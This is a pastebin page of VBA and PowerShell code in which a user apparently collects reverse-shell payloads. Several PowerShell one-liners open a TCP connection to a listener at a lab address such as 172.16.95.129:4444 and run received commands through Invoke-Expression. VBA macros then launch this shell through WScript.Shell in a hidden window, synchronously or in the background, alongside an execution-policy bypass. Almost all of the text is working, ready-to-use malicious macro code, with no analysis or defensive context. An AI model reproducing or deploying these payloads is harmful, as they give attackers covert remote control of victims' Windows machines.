PPaste!

VBA

Home - All the pastes - Authored by Thooms

Raw version

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
$client = New-Object System.Net.Sockets.TCPClient('172.16.95.X',4444);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
    $sendback = (iex ". { $data } 2>&1" | Out-String );
    $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
    $stream.Write($sendbyte,0,$sendbyte.Length);
    $stream.Flush()
};
$client.Close()
powershell.exe -NoExit -ExecutionPolicy Bypass -File .\ton_script.ps1


$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Sub RunMultiLinePS_Inline()
    Dim objShell As Object
    Set objShell = CreateObject("WScript.Shell")

    objShell.Run "powershell.exe -Command ""$msg = 'Hello'; $date = Get-Date; Write-Output $msg; Write-Output $date"""

    Set objShell = Nothing
End Sub
Sub ExecuterReverseShell()
    Dim psCommand As String
    Dim wsh As Object

    ' Le script PowerShell à exécuter
    psCommand = "$client = New-Object System.Net.Sockets.TCPClient('172.16.95.129',4444);" & 
                "$stream = $client.GetStream();" & 
                "[byte[]]$bytes = 0..65535|%{0};" & 
                "while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;" & 
                "$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);" & 
                "$sendback = (iex ""."" { $data } 2>&1"" | Out-String );" & 
                "$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';" & 
                "$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);" & 
                "$stream.Write($sendbyte,0,$sendbyte.Length);" & 
                "$stream.Flush()};" & 
                "$client.Close()"

    ' Crée un objet WScript.Shell
    Set wsh = CreateObject("WScript.Shell")

    ' Exécute PowerShell avec la commande
    wsh.Run "powershell.exe -WindowStyle Hidden -Command ""& {" & psCommand & "}""", 0, True

    ' Libère l'objet
    Set wsh = Nothing
End Sub
Sub ExecuterReverseShellAsync()
    Dim psCommand As String
    Dim wsh As Object

    ' Le script PowerShell à exécuter
    psCommand = "$client = New-Object System.Net.Sockets.TCPClient('172.16.95.129',4444);" & 
                "$stream = $client.GetStream();" & 
                "[byte[]]$bytes = 0..65535|%{0};" & 
                "while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;" & 
                "$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);" & 
                "$sendback = (iex ""."" { $data } 2>&1"" | Out-String );" & 
                "$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';" & 
                "$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);" & 
                "$stream.Write($sendbyte,0,$sendbyte.Length);" & 
                "$stream.Flush()};" & 
                "$client.Close()"

    ' Crée un objet WScript.Shell
    Set wsh = CreateObject("WScript.Shell")

    ' Exécute PowerShell en arrière-plan (asynchrone)
    ' Le dernier paramètre est False pour ne pas attendre la fin
    wsh.Run "powershell.exe -WindowStyle Hidden -Command ""& {" & psCommand & "}""", 0, False

    ' Libère l'objet
    Set wsh = Nothing
End Sub


$sendback = (Invoke-Expression $data 2>&1 | Out-String)